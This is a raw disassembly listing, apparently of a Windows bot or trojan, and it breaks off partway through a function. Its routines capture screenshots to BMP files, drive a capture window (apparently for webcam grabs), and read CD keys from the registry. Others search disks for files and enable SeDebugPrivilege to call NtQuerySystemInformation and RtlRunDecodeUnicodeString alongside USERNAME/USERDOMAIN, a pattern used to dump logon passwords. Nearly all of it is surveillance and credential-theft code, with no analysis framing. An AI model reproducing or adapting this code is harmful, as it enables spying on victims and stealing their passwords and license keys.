var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_436454 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_406E2D
push 8
push edi
call ds:dword_436470 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call ds:dword_436470 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call ds:dword_436470 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_406C5B
push 18h
push edi
call ds:dword_436470 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_406C5D
; ---------------------------------------------------------------------------
loc_406C5B: ; CODE XREF: sub_406BF9+50�j
xor ebx, ebx
loc_406C5D: ; CODE XREF: sub_406BF9+60�j
push edi
call ds:dword_4364B4 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_406E12
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call ds:dword_4364AC ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_406E1D
push eax
push [ebp+var_4]
call ds:dword_436344 ; SelectObject
cmp eax, esi
jz loc_406E1D
cmp eax, 0FFFFFFFFh
jz loc_406E1D
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call ds:dword_4364B0 ; BitBlt
test eax, eax
jz loc_406E1D
cmp ebx, esi
jz short loc_406D1A
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call ds:dword_436398 ; GetDIBColorTable
mov ebx, eax
loc_406D1A: ; CODE XREF: sub_406BF9+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:off_42207C
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_406DFD
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_4220B0 ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_4220B0 ; WriteFile
cmp ebx, esi
jz short loc_406DDF
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_4220B0 ; WriteFile
loc_406DDF: ; CODE XREF: sub_406BF9+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4220B0 ; WriteFile
push [ebp+arg_0]
call ds:off_422074
push 1
pop esi
loc_406DFD: ; CODE XREF: sub_406BF9+1A2�j
push [ebp+var_1C]
call ds:dword_4363CC ; DeleteObject
push [ebp+var_4]
call ds:dword_436330 ; DeleteDC
mov edi, [ebp+var_20]
loc_406E12: ; CODE XREF: sub_406BF9+70�j
push edi
call ds:dword_436330 ; DeleteDC
mov eax, esi
jmp short loc_406E2F
; ---------------------------------------------------------------------------
loc_406E1D: ; CODE XREF: sub_406BF9+C7�j
; sub_406BF9+D9�j ...
push edi
call ds:dword_436330 ; DeleteDC
push [ebp+var_4]
call ds:dword_436330 ; DeleteDC
loc_406E2D: ; CODE XREF: sub_406BF9+23�j
xor eax, eax
loc_406E2F: ; CODE XREF: sub_406BF9+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_406BF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E34 proc near ; CODE XREF: sub_40D2E0+46EB�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_434F00
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_4363C0
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_406E72
mov eax, esi
jmp loc_407028
; ---------------------------------------------------------------------------
loc_406E72: ; CODE XREF: sub_406E34+35�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406E8F
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4364C4 ; SendMessageA
jmp short loc_406E91
; ---------------------------------------------------------------------------
loc_406E8F: ; CODE XREF: sub_406E34+47�j
xor eax, eax
loc_406E91: ; CODE XREF: sub_406E34+59�j
cmp eax, ebx
jnz short loc_406E9C
loc_406E95: ; CODE XREF: sub_406E34+88�j
; sub_406E34+BC�j
mov ebx, esi
jmp loc_40701D
; ---------------------------------------------------------------------------
loc_406E9C: ; CODE XREF: sub_406E34+5F�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406EB9
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_406EB9: ; CODE XREF: sub_406E34+71�j
cmp [ebp+var_20], ebx
jz short loc_406E95
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_406EDF
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_406EE2
; ---------------------------------------------------------------------------
loc_406EDF: ; CODE XREF: sub_406E34+98�j
mov [ebp+arg_4], ebx
loc_406EE2: ; CODE XREF: sub_406E34+A9�j
push [ebp+arg_4]
call sub_415D2F
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_406E95
push [ebp+arg_4]
call sub_415D2F
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_406F09
push 1
pop ebx
jmp loc_40701D
; ---------------------------------------------------------------------------
loc_406F09: ; CODE XREF: sub_406E34+CB�j
push [ebp+var_4]
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406F26
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_406F26: ; CODE XREF: sub_406E34+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_415560
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_406F41
mov ecx, 280h
loc_406F41: ; CODE XREF: sub_406E34+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_406F4D
mov eax, 1E0h
loc_406F4D: ; CODE XREF: sub_406E34+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_436408 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_406F97
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_406F97: ; CODE XREF: sub_406E34+153�j
push [ebp+var_4]
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406FB4
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_406FB4: ; CODE XREF: sub_406E34+16E�j
push [ebp+var_4]
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406FD3
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_406FD3: ; CODE XREF: sub_406E34+18B�j
push [ebp+var_4]
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_406FF0
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_406FF0: ; CODE XREF: sub_406E34+1AA�j
push [ebp+var_8]
call sub_415DE1
push esi
call sub_415DE1
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_40701D
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_4364C4 ; SendMessageA
loc_40701D: ; CODE XREF: sub_406E34+63�j
; sub_406E34+D0�j ...
push [ebp+var_4]
call ds:dword_436518 ; DestroyWindow
mov eax, ebx
loc_407028: ; CODE XREF: sub_406E34+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_406E34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40702D proc near ; CODE XREF: sub_40D2E0+47A4�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_434F00
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_4363C0
mov edi, eax
cmp edi, ebx
jnz short loc_40706B
mov eax, esi
jmp loc_407267
; ---------------------------------------------------------------------------
loc_40706B: ; CODE XREF: sub_40702D+35�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_407088
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4364C4 ; SendMessageA
jmp short loc_40708A
; ---------------------------------------------------------------------------
loc_407088: ; CODE XREF: sub_40702D+47�j
xor eax, eax
loc_40708A: ; CODE XREF: sub_40702D+59�j
cmp eax, ebx
jnz short loc_407095
loc_40708E: ; CODE XREF: sub_40702D+8B�j
; sub_40702D+BC�j
mov ebx, esi
jmp loc_40725E
; ---------------------------------------------------------------------------
loc_407095: ; CODE XREF: sub_40702D+5F�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_4070B5
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_4070B5: ; CODE XREF: sub_40702D+71�j
cmp [ebp+var_7C], ebx
jz short loc_40708E
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_4070D8
push ebx
push ebx
push 42Ch
push edi
call ds:dword_4364C4 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_4070DB
; ---------------------------------------------------------------------------
loc_4070D8: ; CODE XREF: sub_40702D+96�j
mov [ebp+arg_4], ebx
loc_4070DB: ; CODE XREF: sub_40702D+A9�j
push [ebp+arg_4]
call sub_415D2F
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_40708E
push [ebp+arg_4]
call sub_415D2F
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_407102
push 1
pop ebx
jmp loc_40725E
; ---------------------------------------------------------------------------
loc_407102: ; CODE XREF: sub_40702D+CB�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_40711F
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call ds:dword_4364C4 ; SendMessageA
loc_40711F: ; CODE XREF: sub_40702D+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_415560
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_40713A
mov ecx, 0A0h
loc_40713A: ; CODE XREF: sub_40702D+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_407144
push 78h
pop eax
loc_407144: ; CODE XREF: sub_40702D+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_407189
push esi
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_407189: ; CODE XREF: sub_40702D+14A�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_4071A6
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call ds:dword_4364C4 ; SendMessageA
loc_4071A6: ; CODE XREF: sub_40702D+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_4071E4
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call ds:dword_4364C4 ; SendMessageA
loc_4071E4: ; CODE XREF: sub_40702D+1A3�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_4071FF
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_4364C4 ; SendMessageA
loc_4071FF: ; CODE XREF: sub_40702D+1C0�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_407218
push ebx
push ebx
push 43Eh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_407218: ; CODE XREF: sub_40702D+1DB�j
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_407235
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_407235: ; CODE XREF: sub_40702D+1F4�j
push [ebp+var_4]
call sub_415DE1
push esi
call sub_415DE1
pop ecx
pop ecx
push edi
call ds:dword_436408 ; IsWindow
test eax, eax
jz short loc_40725E
push ebx
push ebx
push 40Bh
push edi
call ds:dword_4364C4 ; SendMessageA
loc_40725E: ; CODE XREF: sub_40702D+63�j
; sub_40702D+D0�j ...
push edi
call ds:dword_436518 ; DestroyWindow
mov eax, ebx
loc_407267: ; CODE XREF: sub_40702D+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40702D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40726C proc near ; CODE XREF: sub_40D2E0+588B�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp ds:off_426FAC, ebx
mov [ebp+var_C], 80h
jz loc_40740D
push esi
push edi
mov eax, offset off_426FAC
mov esi, offset dword_426FB8
mov edi, offset aSCdKeyS_ ; "%s CD Key: (%s)."
loc_40729C: ; CODE XREF: sub_40726C+199�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_4364D8 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_436374 ; RegQueryValueExA
test eax, eax
jnz loc_4073F3
mov eax, [esi]
cmp eax, ebx
jz loc_4073B7
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_415480
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_415B78
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_4073F3
push eax
loc_407315: ; CODE XREF: sub_40726C+D4�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41712C
add esp, 0Ch
test eax, eax
jz loc_4073AC
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_407342
push [ebp+var_8]
jmp short loc_407315
; ---------------------------------------------------------------------------
loc_407342: ; CODE XREF: sub_40726C+CF�j
push 3Dh
push dword ptr [esi+4]
call sub_417070
pop ecx
test eax, eax
pop ecx
jz short loc_407370
lea eax, [ebp+var_70]
push offset asc_4281B0 ; "="
push eax
call sub_416C8F
push offset asc_4281B0 ; "="
push ebx
call sub_416C8F
add esp, 10h
jmp short loc_407373
; ---------------------------------------------------------------------------
loc_407370: ; CODE XREF: sub_40726C+E4�j
lea eax, [ebp+var_70]
loc_407373: ; CODE XREF: sub_40726C+102�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_415480
add esp, 10h
lea eax, [ebp+var_2F0]
push ebx
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
lea eax, [ebp+var_2F0]
push eax
call sub_40A5B3
add esp, 18h
loc_4073AC: ; CODE XREF: sub_40726C+B9�j
push [ebp+var_8]
call sub_415AD0
pop ecx
jmp short loc_4073F3
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_40726C+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
lea eax, [ebp+var_2F0]
push eax
call sub_40A5B3
add esp, 28h
loc_4073F3: ; CODE XREF: sub_40726C+60�j
; sub_40726C+A2�j ...
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], ebx
lea eax, [esi-0Ch]
jnz loc_40729C
pop edi
pop esi
loc_40740D: ; CODE XREF: sub_40726C+19�j
pop ebx
leave
retn
sub_40726C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407410 proc near ; DATA XREF: sub_40D2E0+3D60�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_415C80
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_407465
lea eax, [ebp+var_114]
push eax
call sub_415C80
pop ecx
mov [ebp+eax+var_115], bl
loc_407465: ; CODE XREF: sub_407410+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_428204
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4074AA
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40BAE7
add esp, 14h
loc_4074AA: ; CODE XREF: sub_407410+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_40752B
add esp, 18h
push eax
lea eax, [ebp+var_49C]
push offset unk_4281D4
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40750B
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40BAE7
add esp, 14h
loc_40750B: ; CODE XREF: sub_407410+D9�j
lea eax, [ebp+var_49C]
push eax
call sub_40A5B3
push [ebp+var_10]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_407410 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40752B proc near ; CODE XREF: sub_407410+B9�p
; sub_40752B+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_4 ; "%s\\*"
push esi
push eax
call sub_4159FA
mov edi, ds:off_422094
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_4DA334
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_3 ; "%s\\%s"
jz short loc_4075E8
loc_407577: ; CODE XREF: sub_40752B+BB�j
test [ebp+var_144], 10h
jz short loc_4075D4
cmp [ebp+var_118], 2Eh
jnz short loc_40759B
cmp [ebp+var_117], 0
jz short loc_4075D4
cmp [ebp+var_117], 2Eh
jz short loc_4075D4
loc_40759B: ; CODE XREF: sub_40752B+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_4159FA
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40752B
add esp, 2Ch
mov [ebp+arg_14], eax
loc_4075D4: ; CODE XREF: sub_40752B+53�j
; sub_40752B+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:off_422090
test eax, eax
jnz short loc_407577
loc_4075E8: ; CODE XREF: sub_40752B+4A�j
push [ebp+var_4]
call ds:off_422084
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_4159FA
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_4DA334
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40766E
loc_40761F: ; CODE XREF: sub_40752B+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_4159FA
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:off_422090
test eax, eax
jnz short loc_40761F
loc_40766E: ; CODE XREF: sub_40752B+F2�j
push esi
call ds:off_422084
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_40752B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40767D proc near ; DATA XREF: sub_40D2E0+5237�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_409DD0
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_4076BC
cmp eax, 2
jz short loc_4076BC
push offset unk_428478
jmp loc_4077FB
; ---------------------------------------------------------------------------
loc_4076BC: ; CODE XREF: sub_40767D+2E�j
; sub_40767D+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41358D
pop ecx
test eax, eax
pop ecx
jz loc_4077F6
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:off_4220C0
mov esi, ds:off_4220BC
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; sub_4DB076
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov ds:dword_436114, eax
call esi ; sub_4DB076
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov ds:dword_436108, eax
call esi ; sub_4DB076
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov ds:dword_436318, eax
call esi ; sub_4DB076
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov ds:dword_436110, eax
call esi ; sub_4DB076
mov ds:dword_43610C, eax
call sub_40784F
test eax, eax
mov [ebp+arg_0], eax
jz loc_4077C9
mov esi, ds:dword_4220B8
mov edi, 400h
mov ebx, offset dword_435108
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_435908
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_436320
push [ebp+arg_0]
jnz short loc_407775
call sub_4079D8
jmp short loc_40777A
; ---------------------------------------------------------------------------
loc_407775: ; CODE XREF: sub_40767D+EF�j
call sub_407B7F
loc_40777A: ; CODE XREF: sub_40767D+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_4077C2
cmp ds:dword_436320, 0
jnz short loc_4077A9
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_428324
push 200h
push eax
call sub_4159FA
add esp, 18h
jmp short loc_4077DC
; ---------------------------------------------------------------------------
loc_4077A9: ; CODE XREF: sub_40767D+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_4077B9
call sub_407CB5
jmp short loc_4077BE
; ---------------------------------------------------------------------------
loc_4077B9: ; CODE XREF: sub_40767D+133�j
call sub_407D4C
loc_4077BE: ; CODE XREF: sub_40767D+13A�j
pop ecx
push eax
jmp short loc_4077CE
; ---------------------------------------------------------------------------
loc_4077C2: ; CODE XREF: sub_40767D+101�j
push offset unk_4282DC
jmp short loc_4077CE
; ---------------------------------------------------------------------------
loc_4077C9: ; CODE XREF: sub_40767D+B6�j
push offset unk_428298
loc_4077CE: ; CODE XREF: sub_40767D+143�j
; sub_40767D+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_415480
pop ecx
pop ecx
loc_4077DC: ; CODE XREF: sub_40767D+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41358D
pop ecx
pop ecx
push [ebp+var_8]
call ds:off_4220B4
pop ebx
jmp short loc_407809
; ---------------------------------------------------------------------------
loc_4077F6: ; CODE XREF: sub_40767D+4E�j
push offset unk_428254
loc_4077FB: ; CODE XREF: sub_40767D+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_415480
pop ecx
pop ecx
loc_407809: ; CODE XREF: sub_40767D+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_407830
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40BAE7
add esp, 14h
loc_407830: ; CODE XREF: sub_40767D+191�j
lea eax, [ebp+var_29C]
push eax
call sub_40A5B3
push [ebp+var_18]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_40767D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40784F proc near ; CODE XREF: sub_40767D+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4220CC
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4220C8
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call ds:dword_436114
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4220C4 ; RtlFreeHeap
